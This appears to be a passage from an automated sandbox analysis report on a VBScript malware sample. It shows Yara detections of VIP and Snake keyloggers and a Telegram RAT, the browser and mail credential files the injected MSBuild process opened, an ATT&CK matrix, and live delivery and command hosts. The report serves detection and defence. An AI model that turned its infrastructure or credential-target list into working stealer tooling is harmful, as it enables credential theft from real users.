                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information321
                  Scripting                  		Valid Accounts1
                  Exploitation for Client Execution                  		321
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		2
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter                  		1
                  DLL Side-Loading                  		211
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  PowerShell                  		Logon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager1
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput Capture1
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading                  		LSA Secrets31
                  Virtualization/Sandbox Evasion                  		SSHKeylogging3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input Capture24
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                  Process Injection                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617738 Sample: jjmax il.vbs Startdate: 18/02/2025 Architecture: WINDOWS Score: 100 23 reallyfreegeoip.org 2->23 25 paste.ee 2->25 27 11 other IPs or domains 2->27 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 53 15 other signatures 2->53 8 wscript.exe 2 2->8         started        signatures3 49 Tries to detect the country of the analysis system (by using the IP) 23->49 51 Connects to a pastebin service (likely for C&C) 25->51 process4 signatures5 55 VBScript performs obfuscated calls to suspicious functions 8->55 57 Suspicious powershell command line found 8->57 59 Wscript starts Powershell (via cmd or directly) 8->59 61 2 other signatures 8->61 11 powershell.exe 14 15 8->11         started        process6 dnsIp7 29 ip.3005.filemail.com 193.30.119.105, 443, 49699 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown 11->29 31 paste.ee 23.186.113.60, 443, 49700 KLAYER-GLOBALNL Reserved 11->31 63 Writes to foreign memory regions 11->63 65 Injects a PE file into a foreign processes 11->65 15 MSBuild.exe 15 2 11->15         started        19 conhost.exe 11->19         started        21 MSBuild.exe 11->21         started        signatures8 process9 dnsIp10 33 turkey.ipchina163.com 111.90.142.170, 49844, 587 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 15->33 35 checkip.dyndns.com 132.226.8.169, 49707, 49725, 49737 UTMEMUS United States 15->35 37 2 other IPs or domains 15->37 39 Tries to steal Mail credentials (via file / registry access) 15->39 41 Tries to harvest and steal browser information (history, passwords, etc) 15->41 signatures11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.